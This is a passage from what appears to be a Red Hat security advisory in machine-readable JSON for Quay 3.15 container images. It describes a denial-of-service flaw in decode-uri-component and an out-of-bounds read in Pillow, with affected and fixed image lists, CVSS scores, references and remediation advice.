"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2494807"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `decode-uri-component` library. This vulnerability allows a remote attacker to trigger a Denial of Service (DoS) by submitting specially crafted input. The `decode()` function, when processing a large number of encoded URI components, consumes excessive CPU resources, which can lead to the application becoming unresponsive and unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "decode-uri-component: decode-uri-component: Denial of Service via crafted input",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A denial of service flaw was found in the decode-uri-component npm package. The decode() function exhibits super-linear time complexity when processing input containing many percent-encoded sequences, allowing an attacker to cause significant CPU consumption and event-loop blocking. In Red Hat products where this package is bundled (OpenShift Console, Quay, Pipelines, RHOAI, and others), exploitation requires that attacker-controlled input containing crafted percent-encoded strings reaches the decode() function without prior length validation. Red Hat rates this as Moderate severity since the impact is limited to availability with no confidentiality or integrity impact, consistent with the CNA\u0027s CVSS 4.0 assessment of 6.6 Medium.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45822"
},
{
"category": "external",
"summary": "RHBZ#2494807",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494807"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45822",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45822"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45822",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45822"
},
{
"category": "external",
"summary": "https://github.com/SamVerschueren/decode-uri-component/blob/00662938dc7c6241547ae8abce7785cc13ffd3f6/index.js",
"url": "https://github.com/SamVerschueren/decode-uri-component/blob/00662938dc7c6241547ae8abce7785cc13ffd3f6/index.js"
},
{
"category": "external",
"summary": "https://github.com/SamVerschueren/decode-uri-component/commit/fa479dafeede7bedf04e5c89aa78f2a78c664005",
"url": "https://github.com/SamVerschueren/decode-uri-component/commit/fa479dafeede7bedf04e5c89aa78f2a78c664005"
},
{
"category": "external",
"summary": "https://www.npmjs.com/package/decode-uri-component",
"url": "https://www.npmjs.com/package/decode-uri-component"
}
],
"release_date": "2026-06-30T08:05:36.399000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "Validate and limit the length of any user-controlled input before passing it to decode-uri-component\u0027s decode() function. Inputs containing more than approximately 200 percent-encoded tokens (e.g. \u0027%ab\u0027 sequences) can trigger noticeable delays. Reject or truncate URI components exceeding a reasonable length threshold before decoding. A fix exists in the upstream repository (commit fa479daf) but has not yet been included in an npm release.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "decode-uri-component: decode-uri-component: Denial of Service via crafted input"
},
{
"cve": "CVE-2026-54058",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-07-14T17:02:34.864708+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500057"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. When an uncompressed McIdas AREA image is loaded from a filename through the mmap raw codec path, attacker-controlled header words can set a row stride smaller than the natural row width. Pixel access such as Image.tobytes(), getpixel, convert, or save can then read beyond the mapped region, disclosing adjacent process memory or causing a fault.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow is vulnerable to an out-of-bounds read when processing a crafted uncompressed McIdas AREA image via the mmap raw codec. A remote attacker who can supply such an image to a service that loads it without user interaction may disclose adjacent process memory or trigger a denial of service. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54058"
},
{
"category": "external",
"summary": "RHBZ#2500057",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500057"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54058"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54058",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54058"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/6a8de891fb00968e5ea79bfa84368ed90b3cfc1d",
"url": "https://github.com/python-pillow/Pillow/commit/6a8de891fb00968e5ea79bfa84368ed90b3cfc1d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9719",
"url": "https://github.com/python-pillow/Pillow/pull/9719"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-62p4-gmf7-7g93",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-62p4-gmf7-7g93"
}
],
"release_date": "2026-07-14T16:27:38.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
